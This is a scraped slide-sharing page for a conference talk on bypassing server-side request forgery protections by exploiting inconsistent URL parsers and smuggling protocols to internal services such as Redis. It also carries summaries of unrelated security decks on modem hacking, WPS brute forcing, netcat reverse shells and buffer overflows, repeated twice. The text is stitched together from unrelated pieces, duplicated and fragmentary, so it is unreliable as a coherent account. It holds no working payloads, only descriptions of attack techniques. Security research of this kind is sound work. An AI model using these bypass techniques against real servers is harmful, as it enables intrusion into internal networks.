The document discusses server-side request forgery (SSRF) vulnerabilities and techniques for exploiting and bypassing URL parsing issues to achieve protocol smuggling. It provides examples of exploiting URL parsers in various programming languages to conduct CR-LF injection and host/path injection. It also demonstrates abusing features of Glibc NSS and protocols like HTTPS to smuggle protocols over TLS SNI or bypass patches. The talk appears to be about advanced SSRF attacks and protocol smuggling techniques.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
Netcat (nc) is a networking utility that can be used to transfer files, run commands remotely, and scan ports on remote systems. It allows establishing TCP and UDP connections to ports on remote systems. The document provides examples of using nc to scan ports, transfer files between systems, set up reverse shells, and perform basic network tasks and administration. Google dorking techniques are also presented for searching websites and finding specific pages or files using keywords, titles, and URLs. The Whois tool is demonstrated to query registration records for domain names and obtain information like registrar, IP address, and name servers.
This document discusses network programming in Python using sockets. It explains that sockets allow communication across networks and the Python socket module provides an interface to work with sockets. It then describes how to create server and client sockets, including binding, listening, accepting connections, and sending/receiving data. It also covers different socket address families like AF_INET for IPv4 and provides code examples for a basic echo server and handling multiple clients using threads or processes.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
Netcat (nc) is a networking utility that can be used to transfer files, run commands remotely, and scan ports on remote systems. It allows establishing TCP and UDP connections to ports on remote systems. The document provides examples of using nc to scan ports, transfer files between systems, set up reverse shells, and perform basic network tasks and administration. Google dorking techniques are also presented for searching websites and finding specific pages or files using keywords, titles, and URLs. The Whois tool is demonstrated to query registration records for domain names and obtain information like registrar, IP address, and name servers.
This document discusses network programming in Python using sockets. It explains that sockets allow communication across networks and the Python socket module provides an interface to work with sockets. It then describes how to create server and client sockets, including binding, listening, accepting connections, and sending/receiving data. It also covers different socket address families like AF_INET for IPv4 and provides code examples for a basic echo server and handling multiple clients using threads or processes.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
Vpn site to site 2 asa qua gpon ftth thực tếlaonap166
The document describes configuring a site-to-site VPN between two ASA firewalls located behind GPON routers in Ho Chi Minh City and Hanoi, Vietnam. Key steps include configuring interfaces and routing on the ASA in Hanoi, defining network objects, creating a crypto map to match traffic to the VPN, and establishing an IKEv1 and IPsec tunnel to the ASA in Ho Chi Minh City using pre-shared keys. Debug commands show the IKE negotiation and establishment of the VPN tunnel.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
This document provides information on configuring network settings on Linux Redhat systems. It discusses using ifconfig to configure interfaces, setting a default gateway and static routes. It also describes the network configuration files - /etc/hosts, /etc/resolv.conf, /etc/sysconfig/network, and /etc/sysconfig/network-scripts/ifcfg files. Specific parameters that can be configured in the ifcfg files are outlined. The document concludes with discussing using the Network Administration Tool and configuring DHCP.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
This document describes a C program to implement a date-time server using TCP. The server program gets the system time, binds to a port, and sends the time string to any connected client. The client program connects to the server, receives the time string from the server, and prints it out. The programs successfully demonstrate a simple client-server model where the server provides the current date and time to multiple clients on request.
This document provides instructions for configuring a Frame Relay hub and spoke topology on several routers (R1, R3, R4, FR) and configuring OSPF routing.
The topology includes a Frame Relay switch router FR connecting to spokes R3 and R4 via DLCI 101 and 301 respectively. Hub R1 connects to FR via DLCI 102.
The tasks are to:
1) Configure Frame Relay on the routers to allow ping from R1 to R3 and R4 but not between R3 and R4.
2) Configure single-area OSPF routing on R1, R3, R4 to advertise all networks and allow full connectivity.
Let's dive under the hood of Java network applications. We plan to have a deep look to classic sockets and NIO having live coding examples. Then we discuss performance problems of sockets and find out how NIO can help us to handle 10000+ connections in a single thread. And finally we learn how to build high load application server using Netty.
https://github.com/kslisenko/java-networking
This document discusses various issues in client/server programming and network server design. It covers topics like identifying servers, UDP and TCP client design, specifying local addresses, partial socket closes, concurrent vs iterative servers, and design alternatives like one process per client, preforked servers, and prethreaded servers. The best design depends on factors like expected client load, transaction sizes, and available system resources. Understanding these issues and testing alternatives is important for choosing an optimal server architecture.
Handy Networking Tools and How to Use ThemSneha Inguva
Linux networking tools can be used to analyze network connectivity and performance. Tools like ifconfig show interface configurations, route displays routing tables, arp shows the ARP cache, dig/nslookup resolve DNS, and traceroute traces the network path. Nmap scans for open ports, ping checks latency, and tcpdump captures traffic. Iperf3 and wrk2 can load test throughput and capacity, while tcpreplay replays captured traffic. These CLI tools provide essential network information and testing capabilities from the command line.
This document provides an overview of routing protocols and network security concepts. It discusses distance vector protocols like RIP, path vector protocols like BGP, and link state protocols like OSPF. It covers routing attacks such as source routing, spoofing, and man-in-the-middle attacks. It also discusses secure routing requirements and authentication methods used in protocols.
True stories on the analysis of network activity using Pythondelimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
The document provides an overview of network security topics including SIEM, logs, NetFlow, web logs, and compliance standards. It discusses how SIEM systems aggregate and correlate log/event data from multiple sources to provide security monitoring, incident response, forensic analysis and compliance reporting capabilities. Specific topics covered include syslog, NetFlow for network monitoring, and examples of web server logs and the types of data that can be extracted from logs for security purposes. Compliance standards like PCI-DSS and SOX are also mentioned in relation to why log collection and monitoring is important for audit requirements.
The document discusses network security and VPN tunnelling. It introduces VPN tunnelling as a way to secure communications over an unsecured network by encrypting the traffic. It describes how tunnelling works by encrypting the traffic and creating a secure tunnel for data transmission. It also discusses SSL/TLS and how it can be used to implement VPN tunnelling by encrypting the traffic and authenticating devices and packets.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
This document discusses the configuration of various server services, including:
- Setting up an Apache web server with SSL encryption and generating SSL certificates.
- Additional Apache configurations like virtual hosting, CGI scripts, and SELinux contexts.
- Basic SMTP configuration using Postfix and setting up an internal mail server.
- Configuring a caching-only DNS server using Named.
- Setting up NFS for file sharing between servers.
- Enabling file sharing with Windows clients using Samba (CIFS).
- Configuring an anonymous FTP server with vsftpd.
It provides instructions and examples for configuring each of these services on Linux servers.
The document discusses network layering models and TCP/IP fundamentals. It describes:
1. Networking problems are divided into layers for easier understanding and standardization, with the two main models being OSI and TCP/IP.
2. The TCP/IP model has four or five layers - process, host-to-host transport, internet, network access, and sometimes physical.
3. Packets are encapsulated as they leave a machine and decapsulated on the receiving host, with each layer adding headers.
The document discusses using Python for ethical hacking and penetration testing. It provides reasons for using Python such as its ease of use, readable syntax, rich libraries, and existing tools. It then covers various Python libraries and frameworks used for tasks like reconnaissance, scanning, exploitation, and packet manipulation. Specific topics covered include file I/O, requests, sockets, scapy, and more.
The document discusses security issues related to connected devices in homes and organizations. It provides results from scanning various devices on home and work networks, including details on open ports and services. It finds issues like outdated protocols, self-signed certificates, and lack of encryption on some devices. It notes that many administrators and users are unaware of vulnerabilities in connected devices. It recommends steps administrators and developers can take to improve device security, such as applying patches, network segmentation, monitoring traffic, using encryption, and penetration testing.
Vpn site to site 2 asa qua gpon ftth thực tếlaonap166
The document describes configuring a site-to-site VPN between two ASA firewalls located behind GPON routers in Ho Chi Minh City and Hanoi, Vietnam. Key steps include configuring interfaces and routing on the ASA in Hanoi, defining network objects, creating a crypto map to match traffic to the VPN, and establishing an IKEv1 and IPsec tunnel to the ASA in Ho Chi Minh City using pre-shared keys. Debug commands show the IKE negotiation and establishment of the VPN tunnel.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
This document provides information on configuring network settings on Linux Redhat systems. It discusses using ifconfig to configure interfaces, setting a default gateway and static routes. It also describes the network configuration files - /etc/hosts, /etc/resolv.conf, /etc/sysconfig/network, and /etc/sysconfig/network-scripts/ifcfg files. Specific parameters that can be configured in the ifcfg files are outlined. The document concludes with discussing using the Network Administration Tool and configuring DHCP.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
This document describes a C program to implement a date-time server using TCP. The server program gets the system time, binds to a port, and sends the time string to any connected client. The client program connects to the server, receives the time string from the server, and prints it out. The programs successfully demonstrate a simple client-server model where the server provides the current date and time to multiple clients on request.
This document provides instructions for configuring a Frame Relay hub and spoke topology on several routers (R1, R3, R4, FR) and configuring OSPF routing.
The topology includes a Frame Relay switch router FR connecting to spokes R3 and R4 via DLCI 101 and 301 respectively. Hub R1 connects to FR via DLCI 102.
The tasks are to:
1) Configure Frame Relay on the routers to allow ping from R1 to R3 and R4 but not between R3 and R4.
2) Configure single-area OSPF routing on R1, R3, R4 to advertise all networks and allow full connectivity.
Let's dive under the hood of Java network applications. We plan to have a deep look to classic sockets and NIO having live coding examples. Then we discuss performance problems of sockets and find out how NIO can help us to handle 10000+ connections in a single thread. And finally we learn how to build high load application server using Netty.
https://github.com/kslisenko/java-networking
This document discusses various issues in client/server programming and network server design. It covers topics like identifying servers, UDP and TCP client design, specifying local addresses, partial socket closes, concurrent vs iterative servers, and design alternatives like one process per client, preforked servers, and prethreaded servers. The best design depends on factors like expected client load, transaction sizes, and available system resources. Understanding these issues and testing alternatives is important for choosing an optimal server architecture.
Handy Networking Tools and How to Use ThemSneha Inguva
Linux networking tools can be used to analyze network connectivity and performance. Tools like ifconfig show interface configurations, route displays routing tables, arp shows the ARP cache, dig/nslookup resolve DNS, and traceroute traces the network path. Nmap scans for open ports, ping checks latency, and tcpdump captures traffic. Iperf3 and wrk2 can load test throughput and capacity, while tcpreplay replays captured traffic. These CLI tools provide essential network information and testing capabilities from the command line.
This document provides an overview of routing protocols and network security concepts. It discusses distance vector protocols like RIP, path vector protocols like BGP, and link state protocols like OSPF. It covers routing attacks such as source routing, spoofing, and man-in-the-middle attacks. It also discusses secure routing requirements and authentication methods used in protocols.
True stories on the analysis of network activity using Pythondelimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
The document provides an overview of network security topics including SIEM, logs, NetFlow, web logs, and compliance standards. It discusses how SIEM systems aggregate and correlate log/event data from multiple sources to provide security monitoring, incident response, forensic analysis and compliance reporting capabilities. Specific topics covered include syslog, NetFlow for network monitoring, and examples of web server logs and the types of data that can be extracted from logs for security purposes. Compliance standards like PCI-DSS and SOX are also mentioned in relation to why log collection and monitoring is important for audit requirements.
The document discusses network security and VPN tunnelling. It introduces VPN tunnelling as a way to secure communications over an unsecured network by encrypting the traffic. It describes how tunnelling works by encrypting the traffic and creating a secure tunnel for data transmission. It also discusses SSL/TLS and how it can be used to implement VPN tunnelling by encrypting the traffic and authenticating devices and packets.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
This document discusses the configuration of various server services, including:
- Setting up an Apache web server with SSL encryption and generating SSL certificates.
- Additional Apache configurations like virtual hosting, CGI scripts, and SELinux contexts.
- Basic SMTP configuration using Postfix and setting up an internal mail server.
- Configuring a caching-only DNS server using Named.
- Setting up NFS for file sharing between servers.
- Enabling file sharing with Windows clients using Samba (CIFS).
- Configuring an anonymous FTP server with vsftpd.
It provides instructions and examples for configuring each of these services on Linux servers.
The document discusses network layering models and TCP/IP fundamentals. It describes:
1. Networking problems are divided into layers for easier understanding and standardization, with the two main models being OSI and TCP/IP.
2. The TCP/IP model has four or five layers - process, host-to-host transport, internet, network access, and sometimes physical.
3. Packets are encapsulated as they leave a machine and decapsulated on the receiving host, with each layer adding headers.
The document discusses using Python for ethical hacking and penetration testing. It provides reasons for using Python such as its ease of use, readable syntax, rich libraries, and existing tools. It then covers various Python libraries and frameworks used for tasks like reconnaissance, scanning, exploitation, and packet manipulation. Specific topics covered include file I/O, requests, sockets, scapy, and more.
The document discusses security issues related to connected devices in homes and organizations. It provides results from scanning various devices on home and work networks, including details on open ports and services. It finds issues like outdated protocols, self-signed certificates, and lack of encryption on some devices. It notes that many administrators and users are unaware of vulnerabilities in connected devices. It recommends steps administrators and developers can take to improve device security, such as applying patches, network segmentation, monitoring traffic, using encryption, and penetration testing.
Upon reading the document, the key steps in a router's start-up process can be summarized as follows:
1. When power is applied, the router performs a power-on self-test and loads the bootstrap code from ROM to initialize hardware and find the IOS image.
2. The IOS image is then loaded from flash memory or another source such as TFTP into RAM where it is decompressed and executed.
3. The startup configuration is loaded, typically from NVRAM. If no configuration is present, the router enters setup mode to configure initial settings.
Office Comunnications Server 2007 R2 PosterPaulo Freitas
This document provides an overview of the workload architecture for a unified communications solution. It includes a legend defining the various hardware components, diagrams showing traffic flows between internal and external systems, and details on DNS records, certificates, and firewall configurations required. The solution comprises multiple workloads including IM and presence, audio/video conferencing, enterprise voice, and application sharing, with load balanced front end servers and edge servers directing traffic between internal and external networks.
This document provides information on various debugging and profiling tools that can be used for Ruby including:
- lsof to list open files for a process
- strace to trace system calls and signals
- tcpdump to dump network traffic
- google perftools profiler for CPU profiling
- pprof to analyze profiling data
It also discusses how some of these tools have helped identify specific performance issues with Ruby like excessive calls to sigprocmask and memcpy calls slowing down EventMachine with threads.
The document discusses various security risks and mitigation strategies at different levels of a software stack, including vulnerabilities that can exist in servers, networks, and applications like Drupal. It provides an overview of the OWASP Top 10 security risks and recommends defensive strategies like secure coding practices and input validation. Specific mitigations are proposed for threats like SQL injection, cross-site scripting, file uploads, and DDoS attacks.
This document provides an overview of common Linux networking commands such as ifconfig, route, traceroute, nslookup, arp, dig, and netstat that are used to configure network interfaces, display routing tables, trace network routes, lookup domain names, manage address resolution, query DNS servers, and view network statistics. It also discusses how to use ifconfig to assign IP addresses to interfaces, route to view routing tables, arp to manage the address resolution cache, and dig for more powerful DNS lookups than nslookup.
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?Julien Vermillard
M2M/IoT is rapidly growing and since its early days different “standard” protocols have emerged (e.g. OMA-DM, TR-069, MQTT, …) or are emerging (e.g. CoAP or Lightweight M2M). Understanding which protocol to use for which application can be intimidating, therefore we propose to give an overview of these protocols to help you understand their goals and characteristics. We’ll present common M2M use cases and why they usually require more than just one protocol ; we will also see whether CoAP associated with Lightweight M2M allows to forge “one protocol to rule them all”.
Presentation of a few mechanisms that can help to automate the bootstrap process in IoT environment.
This is the summary of my work done during an 8 weeks internship at red hat
This document outlines a presentation on how a hacker views a website. It includes sections on introduction, demonstration, tools, CERT-FR, and questions. Tools mentioned include nmap, netdiscover, Wpscan, nessus, nikto, John, Burp, metasploit, sqlmap, and Github for information gathering, vulnerability assessment, and exploitation. It recommends checking the CERT-FR website and following their Twitter account for security advisories.
The document describes steps to configure a network including: designing an IP addressing scheme; configuring DHCP, WAN technologies, EIGRP routing, and NAT; and implementing ACLs for security. Key steps include subnetting the 172.16.1.128/25 network and assigning addresses, configuring R3 as a DHCP server, enabling routing with EIGRP, using NAT on R2 for Internet access, and applying ACLs to restrict access between networks.
Une plongée dans le monde merveilleux des certificats et des autorités de certification. Comment fonctionne une autorité de certification ? Puis-je avoir confiance et pourquoi ? Comment créer la mienne ?
This document provides an overview of the basic function call flow for OpenSSL to establish a secure TCP connection. It discusses initializing the OpenSSL library, creating an SSL_CTX object, generating randomness, creating an SSL object for a connection, performing the TLS/SSL handshake, and reading and writing data over the encrypted connection. It also provides examples of OpenSSL code for a client application.
SIP is a protocol for establishing multimedia sessions over IP networks. It originated from work in the 1990s on protocols like SCIP and SIP drafts. SIP eventually became standardized as RFC 3261 and is now widely used for voice and video calling. Cisco supports SIP in products like Cisco Unified Communications Manager, Cisco Unified Border Element, and Cisco Unified Presence to enable VoIP calling and integration between SIP and other protocols. The future of SIP includes more peer-to-peer implementations and using presence as a foundation for new services.
The document discusses Linux networking commands and tools. It provides examples of using ip commands to view and configure network interfaces, routes, neighbors, and rules. It also shows tcpdump for packet capture and nmap for port scanning. Firewalls are configured using iptables to allow traffic from a specific source to a web server port.
Build reliable, traceable, distributed systems with ZeroMQRobin Xiao
ZeroMQ is used to build a distributed system with reliable and traceable communication. It allows exposing code over RPC with minimal modification. Exceptions are properly propagated across services. The system is language agnostic and brokerless. Introspection allows viewing methods and signatures without opening code. Streaming APIs allow continuous updates without timeouts. Tracing helps profile nested calls and identify performance bottlenecks. Security is not implemented but could use SSL or authentication layers.
The document describes a Secure Active Switch (SAS) system that implements modifications to the Linux kernel bridge to prevent ARP poisoning attacks on a local network. The SAS runs on an embedded system using a ColdFire Motorola processor. It functions as an active network switch that can detect and block ARP attacks by monitoring packets and learning the MAC-IP bindings. Testing showed the SAS successfully blocked ARP poisoning attempts while only adding around 1% more latency to regular network traffic.
The document provides 8 steps to secure a Cisco router by restricting access, disabling unused services, encrypting passwords, and logging activities. These simple steps include controlling access to ports, restricting telnet access, blocking spoof packets, restricting SNMP, encrypting passwords, disabling services like HTTP, adding security options, and configuring logging to a remote server. Proper configuration following these steps can significantly increase router security based on nmap scans showing all ports filtered after securing the device.
Similar to us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf (20)
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
4. The largest hacker conference in Taiwan
founded by chrO.ot
About Orange Tsai
5. Speaker - Speaker at several security conferences
HITCON, WooYun, AVTokyo
CTFer - CTFs we won champions / in finalists (as team HITCON)
DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF
Bounty Hunter - Vendors I have found Remote Code Execution
Facebook, GitHub, Uber, Apple, Yahoo, Imgur
About Orange Tsai
6. Agenda
Introduction
Make SSRF great again
Issues that lead to SSRF-Bypass
Issues that lead to protocol smuggling
Case studies and Demos
Mitigations
7. What is SSRF?
Server Side Request Forgery
Bypass Firewall, Touch Intranet
Compromise Internal services
Struts2
Redis
Elastic
8. Protocol Smuggling in SSRF
Make SSRF more powerful
Protocols that are suitable to smuggle
HTTP based protocol
Elastic, CouchDB, Mongodb, Docker
Text-based protocol
FTP, SMTP, Redis, Memcached
21. URL Parsing Issues
It's all about the inconsistency between URL parser and requester
Why validating a URL is hard?
1. Specification in RFC2396, RFC3986 but just SPEC
2. WHATWG defined a contemporary implementation based on RFC but
different languages still have their own implementations
31. Several programing languages suffered from this issue
cURL, PHP, Python
RFC3968 section 3.2
The authority component is preceded by a double slash ("//") and is
terminated by the next slash ("/"), question mark ("?"), or number sign
("#") character, or by the end of the URI
Abusing URL Parsers
35. Abusing URL Parsers
cURL / libcurl
PHP parse_url 💀
Perl URI 💀
Ruby uri
Ruby addressable 💀
NodeJS url 💀
Java net.URL
Python urlparse
Go net/url 💀
